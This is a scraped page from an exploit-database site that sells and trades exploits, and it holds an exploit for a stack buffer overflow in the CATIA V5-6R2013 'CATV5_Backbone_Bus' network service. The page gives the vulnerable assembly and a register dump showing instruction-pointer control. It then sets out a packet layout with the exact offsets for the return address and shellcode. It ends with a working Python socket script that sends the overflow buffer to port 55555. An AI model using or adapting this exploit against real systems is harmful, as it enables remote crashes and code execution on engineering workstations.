0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Catia V5-6R2013 "CATV5_Backbone_Bus" - Stack Buffer Overflow

Author

Mohamed Shetta

Risk

[

Security Risk High

]

0day-ID

Category

Date add

Platform

'''
#PORT: 55558 Or 55555

Vulnerable Code:
EAX contains the User Supplied data.
 
00406330 |> /8A08 /MOV CL,BYTE PTR DS:[EAX]
00406332 |. |880C02 |MOV BYTE PTR DS:[EDX+EAX],CL
00406335 |. |40 |INC EAX
00406336 |. |84C9 |TEST CL,CL
00406338 |.^\75 F6 \JNZ SHORT 00406330 ; CATSysDe.00406330
 
----------------------------------------------------------------------------------------------------------
Registers Dumb:
 
EAX 00000000
ECX FFB26363
EDX FFB28E70
EBX 00A5A7AA ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 00A5A630 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EBP 72106AE1 MSVCR90.strncmp
ESI 00A5A674 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EDI 00A5A678 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EIP 90909090
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit FFFAF000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0
EFL 00000212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
 
-------------------------------------------------------------------------------------------------------------
Triggering Packet Details:
 
(Packet) Details
 
(XXXX)Size of Next Data | (XXXX)Base for pointers, Set to zero for easy of exploitation. | (A*20)Junk | ("AppToBusInitMsg"+"\x00") Required String | (A*48)Junk | ("CATV5_Backbone_Bus"+"\x00")Required String | (B*49)Junk | (00000000)For Valid Message Sequence(0x00403C13) | (c*408)Junk | (XXXXXXXX)RetAdd | (c*357)small case to prevent converting shell code to small case | (Shell) Shell Code
 
-----------------------------------------------------------------------------------------------------------
Restrictions:
Only the most significant byte in the Return Address can be zero.




import socket
import struct
import ctypes
 
RetAdd="\x90\x90\x90\x90"
Shell="A" *1000
buff= "\x00\x00\x00\x00" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "A" * 48 + "CATV5_Backbone_Bus" +"\x00" + "B"* 49 + "\x00\x00\x00\x00" +"c"* 408 + RetAdd + "c"* 357 + Shell
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 55555))
s.send(struct.pack('>I',len(buff) ))
s.send(buff)

#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Catia V5-6R2013 "CATV5_Backbone_Bus" - Stack Buffer Overflow

Report Error

Report Error